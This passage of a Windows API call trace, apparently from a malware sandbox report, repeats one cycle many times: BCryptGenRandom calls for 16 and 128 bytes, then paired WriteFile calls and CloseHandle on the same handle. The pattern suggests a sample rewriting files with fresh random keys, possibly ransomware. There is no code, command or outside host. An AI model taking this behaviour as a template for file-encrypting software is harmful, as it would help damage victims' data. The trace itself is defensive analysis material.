lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.331] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.331] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.332] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.332] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.332] free (_Block=0x3e305b8) [0139.332] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.332] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.332] free (_Block=0x1fa91d0) [0139.332] free (_Block=0x77d7a8) [0139.332] free (_Block=0x1fa90b8) [0139.332] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.333] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.334] CloseHandle (hObject=0x170) returned 1 [0139.334] free (_Block=0x3df0008) [0139.334] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.342] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.342] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.343] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.343] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.343] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.343] free (_Block=0x3e305b8) [0139.343] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.343] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.344] free (_Block=0x1fa91d0) [0139.344] free (_Block=0x77d7a8) [0139.344] free (_Block=0x1fa90b8) [0139.344] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.344] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.345] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.345] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.372] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x69cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.373] CloseHandle (hObject=0x170) returned 1 [0139.374] free (_Block=0x3df0008) [0139.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.384] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.384] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.384] free (_Block=0x3e305b8) [0139.384] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.384] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.385] free (_Block=0x1fa91d0) [0139.385] free (_Block=0x77d7a8) [0139.385] free (_Block=0x1fa90b8) [0139.385] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.387] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xbd00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.387] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.388] CloseHandle (hObject=0x170) returned 1 [0139.388] free (_Block=0x3df0008) [0139.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.397] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.397] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.397] free (_Block=0x3e305b8) [0139.398] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.398] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.398] free (_Block=0x1fa91d0) [0139.398] free (_Block=0x77d7a8) [0139.398] free (_Block=0x1fa90b8) [0139.398] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.400] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xbd10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.401] CloseHandle (hObject=0x170) returned 1 [0139.401] free (_Block=0x3df0008) [0139.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.412] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.412] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.412] free (_Block=0x3e305b8) [0139.412] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.412] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.412] free (_Block=0x1fa91d0) [0139.412] free (_Block=0x77d7a8) [0139.412] free (_Block=0x1fa90b8) [0139.412] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.414] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.425] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3a94, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.427] CloseHandle (hObject=0x170) returned 1 [0139.427] free (_Block=0x3df0008) [0139.427] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.435] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.436] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.436] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.436] free (_Block=0x3e305b8) [0139.436] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.436] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.437] free (_Block=0x1fa91d0) [0139.437] free (_Block=0x77d7a8) [0139.437] free (_Block=0x1fa90b8) [0139.437] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.439] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4eb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.439] CloseHandle (hObject=0x170) returned 1 [0139.439] free (_Block=0x3df0008) [0139.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.448] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.448] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.448] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.448] free (_Block=0x3e305b8) [0139.448] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.448] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.449] free (_Block=0x1fa91d0) [0139.449] free (_Block=0x77d7a8) [0139.449] free (_Block=0x1fa90b8) [0139.449] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.449] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.450] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3490, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.469] CloseHandle (hObject=0x170) returned 1 [0139.470] free (_Block=0x3df0008) [0139.470] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.510] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.555] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.556] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.556] free (_Block=0x3e305b8) [0139.556] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.556] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.556] free (_Block=0x1fa91d0) [0139.556] free (_Block=0x77d7a8) [0139.556] free (_Block=0x1fa90b8) [0139.556] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.556] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.558] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.558] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.560] CloseHandle (hObject=0x170) returned 1 [0139.561] free (_Block=0x3df0008) [0139.561] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.567] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.568] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.568] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.568] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.568] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.568] free (_Block=0x3e305b8) [0139.568] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.568] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.569] free (_Block=0x1fa91d0) [0139.569] free (_Block=0x77d7a8) [0139.569] free (_Block=0x1fa90b8) [0139.569] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.571] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5720, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.571] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.572] CloseHandle (hObject=0x170) returned 1 [0139.572] free (_Block=0x3df0008) [0139.572] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.581] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.581] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.581] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.581] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.582] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.582] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.582] free (_Block=0x3e305b8) [0139.582] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.582] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.583] free (_Block=0x1fa91d0) [0139.583] free (_Block=0x77d7a8) [0139.583] free (_Block=0x1fa90b8) [0139.583] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.583] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.585] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, 